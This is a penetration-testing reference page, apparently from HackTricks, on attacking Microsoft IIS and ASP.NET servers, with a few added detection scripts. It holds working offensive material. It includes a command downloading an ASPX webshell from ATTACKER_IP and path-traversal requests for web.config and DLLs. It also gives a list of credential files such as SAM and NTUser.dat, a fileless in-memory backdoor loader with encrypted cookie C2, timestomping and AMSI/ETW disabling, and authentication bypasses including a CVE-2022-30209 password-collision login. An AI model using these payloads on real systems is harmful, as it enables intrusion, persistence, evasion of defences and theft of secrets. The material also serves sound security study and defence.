IIS - Internet Information Services

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Test executable file extensions:

  • asp
  • aspx
  • config
  • php

Writable webroot → ASPX command shell

If a low-privileged user/group has write access to C:\inetpub\wwwroot, you can drop an ASPX webshell and execute OS commands in the context of the application pool identity (often holding SeImpersonatePrivilege).

  • Verify ACLs: icacls C:\inetpub\wwwroot or cacls . looking for (F) on your user/group.
  • Upload a command webshell (for example, fuzzdb/tennc cmd.aspx) using PowerShell:
iwr http://ATTACKER_IP/shell.aspx -OutFile C:\inetpub\wwwroot\shell.aspx
  • Request /shell.aspx and run commands; the identity usually shows as iis apppool\defaultapppool.
  • Chain with a Potato-family LPE (for example, GodPotato/SigmaPotato) when the AppPool token has SeImpersonatePrivilege to pivot to SYSTEM.

Internal IP Address Disclosure

On any IIS server where you get a 302 you can try removing the Host header and using HTTP/1.0; in the response, the Location header may reveal the internal IP address:

nc -v domain.com 80
openssl s_client -connect domain.com:443

Response disclosing the internal IP:

GET / HTTP/1.0

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016
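A check for this leak, added here as an example (not code from the original page): it parses a raw 302 response and reports the Location host only when it is a private/internal address literal. The response is constructed from the sample above.

```python
"""Added example: detect an internal IP leaked in the Location header of
an IIS 302 (the Host-less HTTP/1.0 case described above). The sample
response below is constructed from the page's own example."""
import ipaddress
from urllib.parse import urlsplit

# Constructed sample, mirroring the response shown on the page
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Moved Temporarily\r\n"
    "Cache-Control: no-cache\r\n"
    "Pragma: no-cache\r\n"
    "Location: https://192.168.5.237/owa/\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "X-FEServer: NHEXCHANGE2016\r\n"
    "\r\n"
)

def parse_headers(raw: str) -> dict:
    """Return response headers as a lower-cased name -> value dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:   # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers

def leaked_internal_ip(raw: str):
    """Return the private IP literal from the Location header, or None.

    DNS names and public addresses are not a leak; only an IP literal in
    a private range (RFC 1918, loopback, link-local) is reported.
    """
    location = parse_headers(raw).get("location")
    if not location:
        return None
    host = urlsplit(location).hostname
    if host is None:
        return None
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return None          # a hostname, not an IP literal
    return str(addr) if addr.is_private else None

if __name__ == "__main__":
    print(leaked_internal_ip(SAMPLE_RESPONSE))  # 192.168.5.237
```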

Execute .config files

You can upload .config files and use them to execute code. One way to do it is appending the code at the end of the file inside an HTML comment: Download example here

More information and techniques to exploit this vulnerability here

IIS Discovery Bruteforce

Download the list I created:

It was created by merging the contents of the following lists:

https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/IIS.fuzz.txt
http://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html
https://github.com/digination/dirbuster-ng/blob/master/wordlists/vulns/iis.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/aspx.txt
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt
https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt

Use it without adding any extension; the files that need one already have it.

Path Traversal

Leaking source code

See the full write-up at: https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html

Tip

In summary, there are several web.config files inside the application folders with references to "assemblyIdentity" files and "namespaces". With this information it is possible to know where the executables are located and download them.
From the downloaded DLLs it is also possible to find new namespaces where you should try to access and fetch the web.config file in order to find new namespaces and assemblyIdentity entries.
Also, the files connectionstrings.config and global.asax may contain interesting information.

In .NET MVC applications, the web.config file plays a crucial role by specifying each binary file the application relies on through "assemblyIdentity" XML tags.

Exploring Binary Files

An example of accessing the web.config file is shown below:

GET /download_page?id=..%2f..%2fweb.config HTTP/1.1
Host: example-mvc-application.minded

This request reveals various settings and dependencies, such as:

  • EntityFramework version
  • AppSettings for webpages, client validation, and JavaScript
  • System.web configurations for authentication and runtime
  • System.webServer module settings
  • Runtime assembly bindings for numerous libraries such as Microsoft.Owin, Newtonsoft.Json, and System.Web.Mvc

These settings indicate that some files, such as /bin/WebGrease.dll, are located within the application's /bin folder.

Root Directory Files

Files found in the root directory, such as /global.asax and /connectionstrings.config (which contains sensitive passwords), are essential for the application's configuration and operation.

Namespaces and Web.Config

MVC applications also define additional web.config files for specific namespaces to avoid repeating declarations in every file, as shown by a request to download another web.config:

GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
Host: example-mvc-application.minded

Downloading DLLs

Mentioning a specific namespace hints at the presence of a DLL named WebApplication1 in the /bin directory. Following this, a request to download WebApplication1.dll is shown:

GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
Host: example-mvc-application.minded

This suggests the presence of other essential DLLs, such as System.Web.Mvc.dll and System.Web.Optimization.dll, in the /bin directory.

In a scenario where a DLL imports a namespace called WebApplication1.Areas.Minded, an attacker can infer the existence of other web.config files in predictable paths, such as /area-name/Views/, containing specific configurations and references to other DLLs in the /bin directory. For example, a request to /Minded/Views/web.config can reveal configurations and namespaces that indicate the presence of another DLL, WebApplication1.AdditionalFeatures.dll.

Common files

From here

C:\Apache\conf\httpd.conf
C:\Apache\logs\access.log
C:\Apache\logs\error.log
C:\Apache2\conf\httpd.conf
C:\Apache2\logs\access.log
C:\Apache2\logs\error.log
C:\Apache22\conf\httpd.conf
C:\Apache22\logs\access.log
C:\Apache22\logs\error.log
C:\Apache24\conf\httpd.conf
C:\Apache24\logs\access.log
C:\Apache24\logs\error.log
C:\Documents and Settings\Administrator\NTUser.dat
C:\php\php.ini
C:\php4\php.ini
C:\php5\php.ini
C:\php7\php.ini
C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache\logs\access.log
C:\Program Files (x86)\Apache Group\Apache\logs\error.log
C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf
C:\Program Files (x86)\Apache Group\Apache2\logs\access.log
C:\Program Files (x86)\Apache Group\Apache2\logs\error.log
C:\Program Files (x86)\php\php.ini
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache\conf\logs\access.log
C:\Program Files\Apache Group\Apache\conf\logs\error.log
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\logs\access.log
C:\Program Files\Apache Group\Apache2\conf\logs\error.log
C:\Program Files\FileZilla Server\FileZilla Server.xml
C:\Program Files\MySQL\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.1\my.cnf
C:\Program Files\MySQL\MySQL Server 5.1\my.ini
C:\Program Files\MySQL\MySQL Server 5.5\my.cnf
C:\Program Files\MySQL\MySQL Server 5.5\my.ini
C:\Program Files\MySQL\MySQL Server 5.6\my.cnf
C:\Program Files\MySQL\MySQL Server 5.6\my.ini
C:\Program Files\MySQL\MySQL Server 5.7\my.cnf
C:\Program Files\MySQL\MySQL Server 5.7\my.ini
C:\Program Files\php\php.ini
C:\Users\Administrator\NTUser.dat
C:\Windows\debug\NetSetup.LOG
C:\Windows\Panther\Unattend\Unattended.xml
C:\Windows\Panther\Unattended.xml
C:\Windows\php.ini
C:\Windows\repair\SAM
C:\Windows\repair\system
C:\Windows\System32\config\AppEvent.evt
C:\Windows\System32\config\RegBack\SAM
C:\Windows\System32\config\RegBack\system
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SecEvent.evt
C:\Windows\System32\config\SysEvent.evt
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\winevt\Logs\Application.evtx
C:\Windows\System32\winevt\Logs\Security.evtx
C:\Windows\System32\winevt\Logs\System.evtx
C:\Windows\win.ini
C:\xampp\apache\conf\extra\httpd-xampp.conf
C:\xampp\apache\conf\httpd.conf
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\MERCURY.INI
C:\xampp\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\security\webdav.htpasswd
C:\xampp\sendmail\sendmail.ini
C:\xampp\tomcat\conf\server.xml

HTTPAPI 2.0 404 Error

If you see an error like the following one:

This means the server did not receive the correct domain name in the Host header.
To access the web page you can check the SSL certificate being served; you may find the domain/subdomain name there. If it is not there, you may need to brute force VHosts until you find the correct one.

Decrypt protected configuration and ASP.NET Core Data Protection key rings

Two common mechanisms for protecting secrets in IIS-hosted .NET apps are:

  • ASP.NET Protected Configuration (RsaProtectedConfigurationProvider) for web.config sections such as connectionStrings.
  • The ASP.NET Core Data Protection key ring (persisted locally) used to protect application secrets and cookies.

If you have filesystem access or interactive access on the web server, the co-located keys often allow decryption.

  • ASP.NET (Full Framework) – decrypt protected config sections with aspnet_regiis:
# Decrypt a section by app path (site configured in IIS)
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe -pd "connectionStrings" -app "/MyApplication"

# Or specify the physical path (-pef/-pdf write/read to a config file under a dir)
%WINDIR%\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis.exe -pdf "connectionStrings" "C:\inetpub\wwwroot\MyApplication"
  • ASP.NET Core – look for Data Protection key rings stored locally (XML/JSON files) in locations such as:
  • %PROGRAMDATA%\Microsoft\ASP.NET\DataProtection-Keys
  • HKLM\SOFTWARE\Microsoft\ASP.NET\Core\DataProtection-Keys (registry)
  • An app-managed folder (e.g., App_Data\keys or a Keys directory next to the app)

If the key ring is accessible, an operator running as the app identity can instantiate an IDataProtector for the same purposes and unprotect stored secrets. Misconfigurations that keep the key ring alongside the app files make offline decryption trivial once the host is compromised.
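A web.config audit that serves both the path-traversal section above (which DLLs and namespaces an exposed web.config gives away) and this section (whether connectionStrings is actually protected). This is an added example, not code from the page or from any project; the config, the application name WebApplication1 and the placeholder password are constructed.

```python
"""Added example (not from the page or any project): audit an ASP.NET
web.config for what the sections above describe. It lists the DLLs and
namespaces the file reveals to anyone who can read it through traversal,
and reports whether <connectionStrings> carries a configProtectionProvider
(encrypted) or is still plaintext. The sample config is constructed."""
import xml.etree.ElementTree as ET

# Constructed web.config excerpt (not a real application's file)
SAMPLE_WEB_CONFIG = """<configuration>
  <connectionStrings>
    <add name="DefaultConnection"
         connectionString="Server=db1;Database=app;User Id=app;Password=PLACEHOLDER" />
  </connectionStrings>
  <system.web.webPages.razor>
    <pages pageBaseType="System.Web.Mvc.WebViewPage">
      <namespaces>
        <add namespace="System.Web.Mvc" />
        <add namespace="WebApplication1" />
      </namespaces>
    </pages>
  </system.web.webPages.razor>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="Newtonsoft.Json" culture="neutral" />
      </dependentAssembly>
      <dependentAssembly>
        <assemblyIdentity name="System.Web.Mvc" culture="neutral" />
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
</configuration>"""

ASM_NS = "{urn:schemas-microsoft-com:asm.v1}"   # default xmlns of assemblyBinding

def referenced_assemblies(xml_text: str) -> list:
    """DLL paths an exposed web.config points at under the app's /bin."""
    root = ET.fromstring(xml_text)
    names = {e.get("name") for e in root.iter(ASM_NS + "assemblyIdentity")}
    return sorted(f"/bin/{n}.dll" for n in names if n)

def declared_namespaces(xml_text: str) -> list:
    """Namespaces registered for views; each hints at a DLL or an MVC area."""
    root = ET.fromstring(xml_text)
    found = {add.get("namespace") for block in root.iter("namespaces")
             for add in block.findall("add") if add.get("namespace")}
    return sorted(found)

def connection_strings_status(xml_text: str) -> str:
    """'protected', 'plaintext' or 'absent' for the <connectionStrings> section."""
    section = ET.fromstring(xml_text).find("connectionStrings")
    if section is None:
        return "absent"
    return "protected" if section.get("configProtectionProvider") else "plaintext"

if __name__ == "__main__":
    print(referenced_assemblies(SAMPLE_WEB_CONFIG), declared_namespaces(SAMPLE_WEB_CONFIG))
    print(connection_strings_status(SAMPLE_WEB_CONFIG))
```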

IIS fileless backdoors and in-memory .NET loaders (NET-STAR style)

The Phantom Taurus/NET-STAR toolkit shows a mature design for fileless IIS persistence and post-exploitation entirely inside w3wp.exe. The core ideas can be reused for custom tradecraft and for detection/hunting.

Key building blocks

  • ASPX bootstrapper hosting an embedded payload: a single .aspx page (e.g., OutlookEN.aspx) embeds a Base64-encoded, optionally Gzip-compressed .NET DLL. On a trigger request it decodes, decompresses and reflectively loads it into the current AppDomain and invokes the main entry point (e.g., ServerRun.Run()).
  • Cookie-scoped, encrypted C2 with multi-stage packing: tasks/results are wrapped as Gzip → AES-ECB/PKCS7 → Base64 and moved via seemingly legitimate cookie-heavy requests; operators used stable delimiters (e.g., "STAR") for chunking.
  • Reflective .NET execution: accepts arbitrary managed assemblies as Base64, loads them via Assembly.Load(byte[]) and passes operator args, so modules can be swapped quickly without touching disk.
  • Operating in precompiled ASP.NET sites: add/manage auxiliary shells/backdoors even when the site is precompiled (e.g., the dropper adds dynamic pages/handlers or relies on config handlers) – exposed by commands such as bypassPrecompiledApp, addshell, listshell, removeshell.
  • Timestomping/metadata forgery: exposes a changeLastModified action and timestomps during deployment (including future compilation timestamps) to hinder DFIR.
  • Optional AMSI/ETW pre-disable for loaders: the second-stage loader can disable AMSI and ETW before calling Assembly.Load to reduce inspection of in-memory payloads.

Minimal ASPX loader pattern

<%@ Page Language="C#" %>
<%@ Import Namespace="System" %>
<%@ Import Namespace="System.IO" %>
<%@ Import Namespace="System.IO.Compression" %>
<%@ Import Namespace="System.Reflection" %>
<script runat="server">
protected void Page_Load(object sender, EventArgs e){
    // 1) Obtain payload bytes (hard-coded blob or from request)
    string b64 = /* hardcoded or Request["d"] */;
    byte[] blob = Convert.FromBase64String(b64);
    // optional: decrypt here if AES is used
    using(var gz = new GZipStream(new MemoryStream(blob), CompressionMode.Decompress)){
        using(var ms = new MemoryStream()){
            gz.CopyTo(ms);
            var asm = Assembly.Load(ms.ToArray());
            // 2) Invoke the managed entry point (e.g., ServerRun.Run)
            var t = asm.GetType("ServerRun");
            var m = t.GetMethod("Run", BindingFlags.Public|BindingFlags.NonPublic|BindingFlags.Static|BindingFlags.Instance);
            object inst = m.IsStatic ? null : Activator.CreateInstance(t);
            m.Invoke(inst, new object[]{ HttpContext.Current });
        }
    }
}
</script>

Packing/crypto helpers (Gzip + AES-ECB + Base64)

using System;
using System.IO;
using System.IO.Compression;
using System.Security.Cryptography;

static byte[] AesEcb(byte[] data, byte[] key, bool encrypt){
    using(var aes = Aes.Create()){
        aes.Mode = CipherMode.ECB; aes.Padding = PaddingMode.PKCS7; aes.Key = key;
        ICryptoTransform t = encrypt ? aes.CreateEncryptor() : aes.CreateDecryptor();
        return t.TransformFinalBlock(data, 0, data.Length);
    }
}

static string Pack(object obj, byte[] key){
    // serialize → gzip → AES-ECB → Base64
    byte[] raw = Serialize(obj);                    // your TLV/JSON/msgpack
    using var ms = new MemoryStream();
    using(var gz = new GZipStream(ms, CompressionLevel.Optimal, true)) gz.Write(raw, 0, raw.Length);
    byte[] enc = AesEcb(ms.ToArray(), key, true);
    return Convert.ToBase64String(enc);
}

static T Unpack<T>(string b64, byte[] key){
    byte[] enc = Convert.FromBase64String(b64);
    byte[] cmp = AesEcb(enc, key, false);
    using var gz = new GZipStream(new MemoryStream(cmp), CompressionMode.Decompress);
    using var outMs = new MemoryStream(); gz.CopyTo(outMs);
    return Deserialize<T>(outMs.ToArray());
}

Cookie/session flow and command surface

  • Session initialization and tasking are performed via cookies to blend in with normal web activity.
  • Commands observed in real-world use included: fileExist, listDir, createDir, renameDir, fileRead, deleteFile, createFile, changeLastModified; addshell, bypassPrecompiledApp, listShell, removeShell; executeSQLQuery, ExecuteNonQuery; and the dynamic execution primitives code_self, code_pid, run_code for in-memory .NET execution.

Timestomping helper

File.SetCreationTime(path, ts);
File.SetLastWriteTime(path, ts);
File.SetLastAccessTime(path, ts);

Disabling AMSI/ETW inline before Assembly.Load (loader variant)

// Patch amsi!AmsiScanBuffer to return E_INVALIDARG
// and ntdll!EtwEventWrite to a stub; then load operator assembly
DisableAmsi();
DisableEtw();
Assembly.Load(payloadBytes).EntryPoint.Invoke(null, new object[]{ new string[]{ /* args */ } });

See AMSI/ETW bypass techniques in: windows-hardening/av-bypass.md

Hunting notes (defenders)

  • A single unusual ASPX page with long Base64/Gzip blobs; POST requests carrying many cookies.
  • Unbacked managed modules inside w3wp.exe; strings such as Encrypt/Decrypt (ECB), Compress/Decompress, GetContext, Run.
  • Repeated delimiters such as "STAR" in traffic; mismatched or even future timestamps on ASPX files/assemblies.
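The traffic-side hunting notes above, turned into a scoring pass over IIS W3C log lines (added example, not from the page or any vendor tool). It assumes the site logs the optional cs(Cookie) field; the log excerpt, the 64-byte cookie threshold and the client IPs are constructed.

```python
"""Added example (not from the page or any vendor tool): apply the hunting
notes above to IIS W3C log lines: POSTs concentrated on one .aspx page,
oversized cookies, and the 'STAR' chunk delimiter. Assumes the site logs
the optional cs(Cookie) field; the log excerpt is constructed."""
from collections import Counter

# Constructed W3C excerpt; the long cookie on the OutlookEN.aspx POST
# stands in for a Base64 task blob split with the STAR delimiter
SAMPLE_LOG = """#Fields: date time cs-method cs-uri-stem c-ip cs(Cookie) sc-status
2024-05-01 10:00:01 GET /owa/auth/logon.aspx 10.1.1.5 - 200
2024-05-01 10:00:07 POST /OutlookEN.aspx 203.0.113.9 s=QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=STAR=MDEyMzQ1Njc4OWFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo= 200
2024-05-01 10:00:09 POST /OutlookEN.aspx 203.0.113.9 s=YWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXo= 200
2024-05-01 10:00:15 POST /owa/auth.owa 10.1.1.5 PBack=0 302
"""
COOKIE_LEN_ALERT = 64   # constructed threshold; tune per site
DELIMITER = "STAR"      # chunk separator named in the page's notes

def parse_w3c(text: str) -> list:
    """Turn W3C lines into dicts using the #Fields: directive for names."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            parts = line.split(" ")
            if fields and len(parts) == len(fields):
                rows.append(dict(zip(fields, parts)))
    return rows

def score_row(row: dict) -> list:
    """Traits a single request matches (empty list means nothing unusual)."""
    hits = []
    cookie = row.get("cs(Cookie)", "-")
    if row["cs-method"] == "POST" and row["cs-uri-stem"].lower().endswith(".aspx"):
        hits.append("post-to-aspx")
        if cookie != "-" and len(cookie) > COOKIE_LEN_ALERT:
            hits.append("oversized-cookie")
    if DELIMITER in cookie:
        hits.append("delimiter-in-cookie")
    return hits

def hunt(text: str) -> dict:
    """Per flagged URI: the union of traits seen and how many POSTs hit it."""
    rows = parse_w3c(text)
    posts = Counter(r["cs-uri-stem"] for r in rows if r["cs-method"] == "POST")
    report = {}
    for r in rows:
        hits = score_row(r)
        if hits:
            entry = report.setdefault(r["cs-uri-stem"], {"traits": set(), "posts": 0})
            entry["traits"].update(hits)
            entry["posts"] = posts[r["cs-uri-stem"]]
    return report

if __name__ == "__main__":
    for uri, info in hunt(SAMPLE_LOG).items():
        print(uri, sorted(info["traits"]), "posts:", info["posts"])
```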

Telerik UI WebResource.axd unsafe reflection (CVE-2025-3600)

Many ASP.NET applications bundle Telerik UI for ASP.NET AJAX and expose the unauthenticated handler Telerik.Web.UI.WebResource.axd. When the Image Editor cache endpoint is reachable (type=iec), the parameters dkey=1 and prtype can trigger unsafe reflection that runs any public parameterless constructor before authentication. This yields a generally applicable DoS primitive and can extend to pre-auth RCE on apps with unsafe AppDomain.AssemblyResolve handlers.

See the detailed techniques and PoCs here:

Telerik Ui Aspnet Ajax Unsafe Reflection Webresource Axd

Old IIS vulnerabilities worth looking for

Microsoft IIS tilde character "~" Vulnerability/Feature – Short File/Folder Name Disclosure

You can try to enumerate folders and files inside every discovered folder (even if it requires Basic Authentication) using this technique.
The main limitation of this technique, if the server is vulnerable, is that it can only find up to the first 6 letters of each file/folder name and the first 3 letters of the file extension.

You can use https://github.com/irsdl/IIS-ShortName-Scanner to test for this vulnerability:
java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/

Original research: https://soroush.secproject.com/downloadable/microsoft_iis_tilde_character_vulnerability_feature.pdf

You can also use metasploit: use scanner/http/iis_shortname_scanner

A good way to find the full name of the discovered files is to ask LLMs for candidates, as done in the script https://github.com/Invicti-Security/brainstorm/blob/main/fuzzer_shortname.py

Basic Authentication bypass

Bypass basic authentication (IIS 7.5) by trying to access: /admin:$i30:$INDEX_ALLOCATION/admin.php or /admin::$INDEX_ALLOCATION/admin.php

You can try to combine this vulnerability with the previous one to find new folders and bypass the authentication.

ASP.NET Trace.AXD enabled debugging

ASP.NET has a debugging mode and its file is called trace.axd.

It keeps a very detailed log of all requests made to the application over a period of time.

This information includes remote client IPs, session IDs, all request and response cookies, physical paths, source code information, and potentially even usernames and passwords.

https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/


ASPXAUTH uses the following information:

  • validationKey (string): hex-encoded key to use for signature validation.
  • decryptionMethod (string): (default "AES").
  • decryptionIV (string): hex-encoded initialization vector (defaults to a vector of zeros).
  • decryptionKey (string): hex-encoded key to use for decryption.

However, some people will use the default values of these parameters and will use the user's email as the cookie. Therefore, if you can find a website using the same platform that uses the ASPXAUTH cookie and you create a user with the email of the user you want to impersonate on the targeted server, you may be able to use the cookie from the second server on the first one and impersonate that user.
This attack worked in this writeup.

IIS Authentication Bypass with cached passwords (CVE-2022-30209)

Full report here: A bug in the code did not properly check the password supplied by the user, so an attacker whose password hash hits a key that is already in the cache will be able to log in as that user.

# script for sanity check
> type test.py
def HashString(password):
    j = 0
    for c in map(ord, password):
        j = c + (101*j)&0xffffffff
    return j

assert HashString('test-for-CVE-2022-30209-auth-bypass') == HashString('ZeeiJT')

# before the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 401 Unauthorized

# after the successful login
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
HTTP/1.1 200 OK
